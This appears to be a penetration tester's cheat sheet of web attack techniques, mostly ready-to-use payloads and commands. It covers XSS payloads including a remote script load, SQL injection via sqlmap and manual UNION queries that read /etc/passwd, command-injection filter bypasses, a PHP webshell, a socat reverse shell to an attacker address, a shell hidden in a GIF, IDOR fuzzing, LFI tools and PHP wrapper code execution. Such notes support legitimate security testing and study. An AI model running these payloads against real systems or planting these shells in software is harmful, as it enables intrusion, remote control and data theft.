XSS
PoC:
1
<script>alert("hola");</script>
1
<script>alert(document.cookie);</script>
1
<img src="" onerror=alert(window.origin)>
Basic payloads:
1
2
3
4
5
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://<LHOST>/<FILE>"></script>
More information and examples:
https://github.com/payloadbox/xss-payload-list
Automatic tools for discovery XSS vulnerabilities
https://github.com/s0md3v/XSStrike
Example:
1
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
https://github.com/rajeshmajumdar/BruteXSS https://github.com/epsylon/xsser
SSTI (Server Side Template Injection)
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Example:
1
http://vulnerable-website.com/?name=
Detect - Plaintext context:
1
2
3
4
5
6
7
8
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
SQLi (SQL injection)
Automatic tool for SQLi - SQLmap
https://github.com/sqlmapproject/sqlmap
It can proof if the parameter is vulnerable to SQL injection.
Example:
1
python sqlmap.py -u "http://<IP>/section.php?id=51" --batch
The option ‘-u’ is used to provide the target URL, while the switch ‘–batch’ is used for skipping any required user-input, by automatically choosing using the default option.
There are some interesting flags that can be useful.
Basic DB Data Enumeration:
1
--banner --current-user --current-db --is-dba
To get the database list:
1
--dbs
To find out what tables exist in a particular database:
1
--tables -D <databaseName>
To find columns of the table:
1
--columns -D <databaseName> -T <tableName>
Extracting the data from the table:
1
--dump -D <databaseName> -T <tableName>
Example GET/POST Requests:
1
--data '<parameterName=value¶meterName=value>'
Also, if we wanted to specify an alternative HTTP method, other than GET and POST (e.g., PUT), we can utilize the option --method, as follows:
1
--data='<parameter=value>' --method <method>
Full HTTP Requests: If we need to specify a complex HTTP request with lots of different header values and an elongated POST body, we can use the -r flag. With this option, SQLMap is provided with the “request file,” containing the whole HTTP request inside a single textual file. In a common scenario, such HTTP request can be captured from within a specialized proxy application (e.g. Burpsuite) and written into the request file. We can either manually copy the HTTP request from within Burpsuite and write it to a file, or we can right-click the request within Burp and choose Copy to file.
1
sqlmap -r <fileRequest.txt>
Database schema enumeration:
1
--schema
Password enumeration and cracking:
1
--passwords --batch
Searching for data:
1
--search -T <string>
Checking for DBA Privileges
1
--is-dba
If current user is DBA: False, meaning that we do not have DBA access. If current user is DBA: True, meaning that we may have the privilege to read local files.
Reading a local file:
1
--file-read "<fileName>"
Spawing an OS shell:
1
--os-shell
Writing Local Files:
1
--file-write "<nameFile>" --file-dest "<nameFile>"
If a shell can be uploaded, we can do an RCE attack. For example:
1
curl http://www.example.com/shell.php?cmd=ls+-la
Automatic tool for SQLi - Burpsuite (Intruder)
Manual SQLi Attack Testing
Entry point detection:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
'
"
`
')
")
`)
'))
"))
`))
%27
%22
#
%23
;
%3B
)
Comments:
- MySQL
1
2
3
4
5
6
7
#comment
-- comment
/*comment*/
/*! MYSQL Special SQL */
- PostgreSQL
1
2
3
--comment
/*comment*/
- Oracle and SQLite
1
--coment
More info and examples about bypass:
Example - Read local file:
1
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Example - Find current user:
1
cn' UNION SELECT 1, user(), 3, 4-- -
Example - Current database name:
1
cn' UNION select 1,database(),2,3-- -
RCE (Remote Code Execution)
There are various ways to perform RCE attacks, for example:
Concatenating Multiple Commands with ‘;’. Example:
1
ping -c 1 127.0.0.1; whoami
Example with AND operator:
1
ping -c 1 127.0.0.1 && whoami
1
ping -c 1 127.0.0.1 AND whoami
Example with OR operator:
1
ping -c 1 127.0.0.1 || whoami
Example in a POST request:
1
<parameter>=||+whoami
Sometimes the commands can be union with + or url encode or other methods.
Using Brace Expansion
There are many other methods we can utilize to bypass space filters. For example, we can use the Bash Brace Expansion feature, which automatically adds spaces between arguments wrapped between braces, as follows:
1
{ls,-la}
Example RCE: (127.0.0.1%0a{ls,-la}).
The parameter %0a is a space.
Bypassing other blacklisted characters
Besides injection operators and space characters, a very commonly blacklisted character is the slash (/) or backslash (\) character, as it is necessary to specify directories in Linux or Windows. We can utilize several techniques to produce any character we want while avoiding the use of blacklisted characters.
- Linux
There are many techniques we can utilize to have slashes in our payload. One such technique we can use for replacing slashes (or any other character) is through Linux Environment Variables like ${IFS}. While ${IFS} is directly replaced with a space, there’s no such environment variable for slashes or semi-colons. However, these characters may be used in an environment variable, and we can specify start and length of our string to exactly match this character.
1
echo ${LS_COLORS:10:1}
Example RCE: 127.0.0.1${LS_COLORS:10:1}${IFS}
- Linux and Windows
Other way is the obfuscation technique, for example:
1
w'h'o'a'mi
or:
1
w"h"o"a"mi
or:
1
w\h\o\ami
or:
1
wh^oami
or:
1
whoAmi
Example RCE: 127.0.0.1%0aw'h'o'a'mi
- Reversed comands
Another command obfuscation technique is reversing commands and having a command template that switches them back and executes them in real-time. In this case, we will be writing imaohw instead of whoami to avoid triggering the blacklisted command.
Example:
1
echo 'whoami' | rev
1
$(rev<<<'imaohw')
Example RCE: 127.0.0.1%0a$(rev<<<'imaohw')
- Encoded commands
Example:
1
echo -n 'cat /etc/passwd | grep 33' | base64
1
bash<<<$(base64 -d<<<IYIQGEhjkwe==)
Example RCE: 127.0.0.1%0abash<<<$(base64 -d<<<IYIQGEhjkwe==)
Interesting codes:
Using tabs instead of spaces:
1
%09
Will be replaced with a space and a tab:
1
${IFS}
Commas will be replaced with spaces:
1
{ls,-la}
Character that will be replaced with ‘/’:
1
${PATH:0:1}
Character that will be replaced with ‘;’:
1
${LS_COLORS:10:1}
Example RCE attack with PHP
Upload a simple webshell with the following contents:
1
<?php system($_GET['cmd']); ?>
1
curl http://domain.com/uploads/shell.php?cmd=<command>
Example - Socat for reverse shell
Code:
1
socat TCP4:10.10.14.5:8443 EXEC:/bin/bash
Code:
1
/ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:10.10.14.15:8443${IFS}EXEC:bash
Example - Create a malicious image
Example reverse shell PHP into a GIF file:
1
user@domain$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
IDOR (Insecure Direct Object References)
An Insecure Direct Object Reference (IDOR) occurs when it is possible to bypass and access unauthorized resources. For instance, using the URL http://IP/?id=100, if we modify the ‘id’ parameter, we can access information intended for other users. IDORs represent an authorization issue.
Example:
1
http://192.168.1.45/users?id=1
Then, the ID can be changed manually or automatically for example with BurpSuite (with the intruder) and the answer can be examined.
It can be done with ffuf. Example:
1
ffuf -w </path/to/values.txt> -u http://192.168.1.45/users?id=FUZZ
Python Library Hijacking
A Python code can be created to perform an RCE attack, for example:
1
2
3
4
5
6
#!/usr/bin/env python3
import os
id=os.system('id')
print(id)
If the user has execution permissions for ‘python3’ when running the ‘sudo -l’ command, the attack can be carried out as follows:
1
/usr/bin/python3 <fie.py>
File Inclusion
More info and examples in:
Tools LFI
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak
https://github.com/mzfr/liffy
XML External Entity (XXE) Injection
Automatic tool: https://github.com/enjoiz/XXEinjector
Bypass the client-side file type validations
Fuzzing extensions
Dictionary: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
Double extensions
Reverse double extensions
Dictionary double extensions: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
Character Injection
- %20
- %0a
- %00
- %0d0a
- /
- .\
- .
- …
- :
MIME-Type
PHP Wrappers
Example of create a reverse shell PHP to base64:
1
echo '<?php system($_GET["cmd"]); ?>' | base64
Insert it into a parameter:
1
http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>
Download it and get the shell:
1
curl -s 'http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>'
More Wrappers:
1
php://filter/read=convert.base64-encode/recource=config